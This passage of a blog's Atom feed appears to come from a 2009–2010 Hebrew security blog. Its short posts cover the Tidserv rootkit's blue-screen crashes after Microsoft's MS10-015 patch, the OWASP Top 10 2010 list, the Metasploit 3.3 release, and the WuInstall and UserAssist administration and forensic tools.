&lt;a href="http://feedads.g.doubleclick.net/~a/3Hr64jFDWZ4slsyHZxFE1n-yW5s/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/3Hr64jFDWZ4slsyHZxFE1n-yW5s/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/8719107558938259853/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/03/phishing-facebook.html#comment-form" title="2 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/8719107558938259853?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/8719107558938259853?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/03/phishing-facebook.html" title="מתקפת PHISHING במסגרת אהבתנו ל FACEBOOK" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_vzNe-NaiwJI/S4worShL8kI/AAAAAAAAANw/tVa9hv8IUeI/s72-c/facebookphishing.png" height="72" width="72" /><thr:total>2</thr:total></entry><entry gd:etag="W/&quot;DkcGSHk_eyp7ImA9WxBUEkg.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-6176366693604173344</id><published>2010-02-27T09:00:00.000+02:00</published><updated>2010-02-27T09:00:29.743+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-02-27T09:00:29.743+02:00</app:edited><title>Tidserv  and MS10-015 -מסכים כחולים-רע לעסקים</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;עדכוני windows לחודש פברואר 2010 כללו בין השאר עדכון לקרנל המונע העלאת הרשאות -privlages elevation &lt;br /&gt;
העדכון עורר סערה בקרב אנשי הסיסטם ואבטחת המידע בטענה כי כתוצאה מהתקנתו&amp;nbsp;המחשב קורס ומתקבל&amp;nbsp;מסך כחול (blue screen of death).&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_vzNe-NaiwJI/S4i-AcbvO9I/AAAAAAAAANY/QVuTPlqGghU/s1600-h/bscreen.bmp" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" kt="true" src="http://3.bp.blogspot.com/_vzNe-NaiwJI/S4i-AcbvO9I/AAAAAAAAANY/QVuTPlqGghU/s320/bscreen.bmp" /&gt;&lt;/a&gt;&lt;/div&gt;תופעה זו נדירה ביותר ויאמר לזכותה של מיקרוסופט שתהליכי הבדיקות שלה נעשים בצורה מדוקדקת וטובה.&lt;br /&gt;
&lt;br /&gt;
התופעה הקפיצה את אנשי אבטחת המידע לחקור לעומק את העניין והמסקנה לא אחרה לבוא:&lt;br /&gt;
מחשבים&amp;nbsp;שהכילו את הוירוס :&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2008-091809-0911-99"&gt;Backdoor.Tidserv&lt;/a&gt;&amp;nbsp;אשר אחד ממאפיניו הוא שימוש ב ROOTKIT המשנה קבצי מערכת שונים על מנת להסוות את פעילות הוירוס , הם הם היחידים שקיבלו את המסך הכחול הארור.&lt;br /&gt;
&lt;div align="right"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: right;"&gt;הקבצים ששונו ע"י טלאי האבטחה הם:&lt;/div&gt;&lt;div style="text-align: right;"&gt;:atapi.sys&lt;/div&gt;&lt;div style="text-align: right;"&gt;iastor.sys&lt;/div&gt;&lt;div style="text-align: right;"&gt;idechndr.sys&lt;/div&gt;&lt;div style="text-align: right;"&gt;ndis.sys&lt;/div&gt;&lt;div style="text-align: right;"&gt;nvata.sys&lt;/div&gt;&lt;div style="text-align: right;"&gt;vmscsi.sys&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: right;"&gt;בגדול -כאשר הוירוס פונה אל הAPI&amp;nbsp;של חלקים&amp;nbsp;אלו במערכת ההפעלה לאחר השינוי שלהם ע"י ה PATCH - הוא מקבל תשובה שגוייה ונכנס למצב ERROR שבו המחשב קורס.&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;a href="http://www.symantec.com/connect/blogs/tidserv-and-ms10-015"&gt;פרטים נוספים&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;strong&gt;נכון להיום "יוצרי" הוירוס&amp;nbsp;כתבו אותו מחדש כך שיתאים לשינוי שמיקרוסופט ביצעה&amp;nbsp;כי אחרי הכול מסכים כחולים רעים לעסקים גם של מפעילי הוירוס :)&lt;/strong&gt;&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: right;"&gt;לאחר הגילוי - הפצנו את הטלאי בארגוננו - ממליץ לכל שאר הארגונים לבצע זאת.&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-6176366693604173344?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/J74BD_1eF4p-liMma2D7XlaRfaQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/J74BD_1eF4p-liMma2D7XlaRfaQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/J74BD_1eF4p-liMma2D7XlaRfaQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/J74BD_1eF4p-liMma2D7XlaRfaQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/6176366693604173344/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/02/tidserv-and-ms10-015.html#comment-form" title="1 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/6176366693604173344?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/6176366693604173344?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/02/tidserv-and-ms10-015.html" title="Tidserv  and MS10-015 -מסכים כחולים-רע לעסקים" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_vzNe-NaiwJI/S4i-AcbvO9I/AAAAAAAAANY/QVuTPlqGghU/s72-c/bscreen.bmp" height="72" width="72" /><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;DU8GQHgzfCp7ImA9WxBWEEg.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-5463477953872716731</id><published>2010-02-01T22:57:00.000+02:00</published><updated>2010-02-01T22:57:01.684+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-02-01T22:57:01.684+02:00</app:edited><title>מאמר שלי התפרסם היום בירחון אבטחת המידע digitalwhisper</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;לצפיה והורדה:&lt;br /&gt;
&lt;a href="http://www.digitalwhisper.co.il/0x0D/"&gt;http://www.digitalwhisper.co.il/0x0D/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
מומלץ&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-5463477953872716731?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/qz1taGnOCmwgMwef7KCiE5eUNsg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/qz1taGnOCmwgMwef7KCiE5eUNsg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/qz1taGnOCmwgMwef7KCiE5eUNsg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/qz1taGnOCmwgMwef7KCiE5eUNsg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/5463477953872716731/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/02/digitalwhisper.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/5463477953872716731?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/5463477953872716731?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/02/digitalwhisper.html" title="מאמר שלי התפרסם היום בירחון אבטחת המידע digitalwhisper" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;C08GRHs7fip7ImA9WxBSFEU.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-4425517536171557017</id><published>2009-12-20T18:59:00.006+02:00</published><updated>2009-12-22T13:37:05.506+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-22T13:37:05.506+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Administration how to seurity" /><category scheme="http://www.blogger.com/atom/ns#" term="Administration how to" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="windows security" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><title>כלי command חינמי לביצוע עידכוני windows update</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_vzNe-NaiwJI/SzCo9TPsr9I/AAAAAAAAADw/IB4jyx6nUz8/s1600-h/blog_wininstalle.jpg"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 302px; height: 320px;" src="http://4.bp.blogspot.com/_vzNe-NaiwJI/SzCo9TPsr9I/AAAAAAAAADw/IB4jyx6nUz8/s320/blog_wininstalle.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5418016122818310098" /&gt;&lt;/a&gt;&lt;br /&gt;בשיטוטים האחרונים ברשת נתקלתי בכלי מעולה הנקרא- WuInstall1_1 מחברת xeox&lt;div&gt;הכלי כתוב ב C++ ומאפשר שימוש ב windows updateAPI  לבדיקת עדכונים להם התחנה זקוקה&lt;/div&gt;&lt;div&gt;האפשרויות הם רבות וכוללות :&lt;/div&gt;&lt;div&gt;חיפוש בלבד &lt;/div&gt;&lt;div&gt;התקנה&lt;/div&gt;&lt;div&gt;התקנה+REBOOT &lt;/div&gt;&lt;div&gt;בנוסף קיימות אפשריויות לחיפוש עדכון מסויים או לפי סוג העדכון (SOFTWARE,DRIVERS וכדומה).&lt;/div&gt;&lt;div&gt;הכלי פונה לפי ההגדרות בתחנה ל WSUS או לשרתי WINDOWS UPDATE בהתאמה.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;הגרסה בתשלום כוללת פיצ'רים נוספים &lt;/div&gt;&lt;div&gt;מעייו &lt;span class="Apple-style-span"   style="  white-space: pre; font-family:monospace;font-size:medium;"&gt;apt-get קטן לעידכוני חלונות.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;ממליץ בחום לשילוב בסקיפטים .&lt;/div&gt;&lt;div&gt;להוריד &lt;a href="http://www.xeox.com/index.php/en/tools/wuinstall"&gt;מכאן&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-4425517536171557017?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/7g2niORP8pIkEjcmF2NoIu-nOs0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/7g2niORP8pIkEjcmF2NoIu-nOs0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/7g2niORP8pIkEjcmF2NoIu-nOs0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/7g2niORP8pIkEjcmF2NoIu-nOs0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/4425517536171557017/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/12/command-windows-update.html#comment-form" title="3 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/4425517536171557017?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/4425517536171557017?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/12/command-windows-update.html" title="כלי command חינמי לביצוע עידכוני windows update" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_vzNe-NaiwJI/SzCo9TPsr9I/AAAAAAAAADw/IB4jyx6nUz8/s72-c/blog_wininstalle.jpg" height="72" width="72" /><thr:total>3</thr:total></entry><entry gd:etag="W/&quot;CEIHSX08eCp7ImA9WxBTEkw.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-7138786137413029349</id><published>2009-11-28T21:57:00.005+02:00</published><updated>2009-12-07T21:02:18.370+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-07T21:02:18.370+02:00</app:edited><title>OWASP 2010 TOP 10</title><content type="html">&lt;a href="http://www.owasp.org/images/0/0f/OWASP_T10_-_2010_rc1.pdf"&gt;&lt;b&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;לצפיה&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt; -&lt;/b&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="  color: rgb(204, 204, 204); line-height: 21px; font-family:Arial, sans-serif, 'Lucida Grande', Verdana;font-size:15px;"&gt;&lt;p&gt;&lt;b&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;The new OWASP Top Ten can be seen below:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style="text-align: justify; "&gt;&lt;/p&gt;&lt;div style="text-align: right;"&gt;&lt;strong&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;A1 – Injection&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;strong&gt;&lt;div style="text-align: right;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;strong&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;A2 – Cross Site Scripting XSS&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;&lt;div style="text-align: right;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(204, 204, 204); "&gt;&lt;strong&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;A3 – Broken Authentication and Session Management&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(204, 204, 204); "&gt;&lt;strong&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;A4 – Insecure Direct Object References&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(204, 204, 204); "&gt;&lt;strong&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;A5 – Cross Site Request Forgery (CSRF&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(204, 204, 204); "&gt;&lt;strong&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;A6 – Security Misconfiguration(NEW&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(204, 204, 204); "&gt;&lt;strong&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;A7 – Failure to Restrict URL Access&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(204, 204, 204); "&gt;&lt;strong&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;A8 – Unvalidated Redirects and Forwards (NEW&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(204, 204, 204); "&gt;&lt;strong&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;A9 – Insecure Cryptographic Storage&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(204, 204, 204); "&gt;&lt;strong&gt;&lt;span class="Apple-style-span"  style="color:#000000;"&gt;A10 – Insufficient Transport Layer Protection&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;/strong&gt;&lt;p&gt;&lt;/p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-7138786137413029349?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/QlP0G3Zcv3oyD4B1PNnC9MUFLIk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QlP0G3Zcv3oyD4B1PNnC9MUFLIk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/QlP0G3Zcv3oyD4B1PNnC9MUFLIk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QlP0G3Zcv3oyD4B1PNnC9MUFLIk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/7138786137413029349/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/11/owasp-2010-top-10.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/7138786137413029349?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/7138786137413029349?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/11/owasp-2010-top-10.html" title="OWASP 2010 TOP 10" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;C08HQHY6fip7ImA9WxNbF0k.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-8902640631240561153</id><published>2009-11-20T20:28:00.001+02:00</published><updated>2009-11-20T20:30:31.816+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-20T20:30:31.816+02:00</app:edited><title>METASPLOIT 3.3 RELEASED!</title><content type="html">להורדה:&lt;div&gt;http://www.metasploit.com/&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-8902640631240561153?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/zozFwx55wXLVtAvNx8jhDD06xpo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/zozFwx55wXLVtAvNx8jhDD06xpo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/zozFwx55wXLVtAvNx8jhDD06xpo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/zozFwx55wXLVtAvNx8jhDD06xpo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/8902640631240561153/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/11/metasploit-33-released.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/8902640631240561153?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/8902640631240561153?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/11/metasploit-33-released.html" title="METASPLOIT 3.3 RELEASED!" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;C0ADQXw_eyp7ImA9WxBSFEU.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-8751078347175289931</id><published>2009-11-20T19:58:00.006+02:00</published><updated>2009-12-22T13:36:10.243+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-22T13:36:10.243+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="miscrosoft" /><category scheme="http://www.blogger.com/atom/ns#" term="Administration how to seurity" /><category scheme="http://www.blogger.com/atom/ns#" term="Administration how to" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="windows security" /><title>UserAssist - כלי נוסף וטוב ל FORENSIC WINDOWS</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_vzNe-NaiwJI/SwbcaGlN7AI/AAAAAAAAADg/ZZYp2Pn6q-k/s1600/userassistv2a.PNG"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 257px;" src="http://2.bp.blogspot.com/_vzNe-NaiwJI/SwbcaGlN7AI/AAAAAAAAADg/ZZYp2Pn6q-k/s400/userassistv2a.PNG" border="0" alt="" id="BLOGGER_PHOTO_ID_5406250743706283010" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="Apple-style-span"   style="  line-height: 21px; font-family:Verdana, Tahoma, Arial, sans-serif;font-size:13px;"&gt;UserAssist &lt;/span&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana, Tahoma, Arial, sans-serif;font-size:100%;"&gt;&lt;span class="Apple-style-span"  style=" line-height: 21px;font-size:13px;"&gt;explorer שומר את רשימת התוכנות שהורצו על המחשב ב KEY - UserAssist ב REGISTRY&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana, Tahoma, Arial, sans-serif;font-size:100%;"&gt;&lt;span class="Apple-style-span"  style=" line-height: 21px;font-size:13px;"&gt;התוכנה יודעת לפענח את הנתונים ולהציגם בטבלה לפי סדר ההרצה או כל סדר אחר שנרצה.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana, Tahoma, Arial, sans-serif;font-size:100%;"&gt;&lt;span class="Apple-style-span"  style=" line-height: 21px;font-size:13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana, Tahoma, Arial, sans-serif;font-size:100%;"&gt;&lt;span class="Apple-style-span"  style=" line-height: 21px;font-size:13px;"&gt;לא פעם אחת נישאלתי במהלך עבודתי שאלה כמו :" האם אתה יכול להגיד לי מה העובד עשה על המחשב בתאריך X ?" - התוכנה הזאת  היא עוד כלי עזר חשוב לנסיון מענה על שאלה כזאת .&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana, Tahoma, Arial, sans-serif;font-size:100%;"&gt;&lt;span class="Apple-style-span"  style=" line-height: 21px;font-size:13px;"&gt;להורדה:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"   style="font-family:Verdana, Tahoma, Arial, sans-serif;font-size:100%;"&gt;&lt;span class="Apple-style-span"  style=" line-height: 21px;font-size:13px;"&gt;&lt;a href="http://blog.didierstevens.com/programs/userassist/"&gt;http://blog.didierstevens.com/programs/userassist/&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:Verdana, Tahoma, Arial, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:Verdana, Tahoma, Arial, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;* התוכנה מחייבת dot net 2 &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:Verdana, Tahoma, Arial, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;* התוכנה מאפשרת קריאת קובץ REG מיובא ממחשב אחר.(COOL!)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:Verdana, Tahoma, Arial, sans-serif;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-8751078347175289931?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/703JJqun5SbjckKgXw8FZ5eSeCo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/703JJqun5SbjckKgXw8FZ5eSeCo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/703JJqun5SbjckKgXw8FZ5eSeCo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/703JJqun5SbjckKgXw8FZ5eSeCo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="related" href="http://blog.didierstevens.com/programs/userassist/" title="UserAssist - כלי נוסף וטוב ל FORENSIC WINDOWS" /><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/8751078347175289931/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2009/11/userassist-forensic-windows.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/8751078347175289931?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/8751078347175289931?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2009/11/userassist-forensic-windows.html" title="UserAssist - כלי נוסף וטוב ל FORENSIC WINDOWS" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_vzNe-NaiwJI/SwbcaGlN7AI/AAAAAAAAADg/ZZYp2Pn6q-k/s72-c/userassistv2a.PNG" height="72" width="72" /><thr:total>0</thr:total></entry><entry 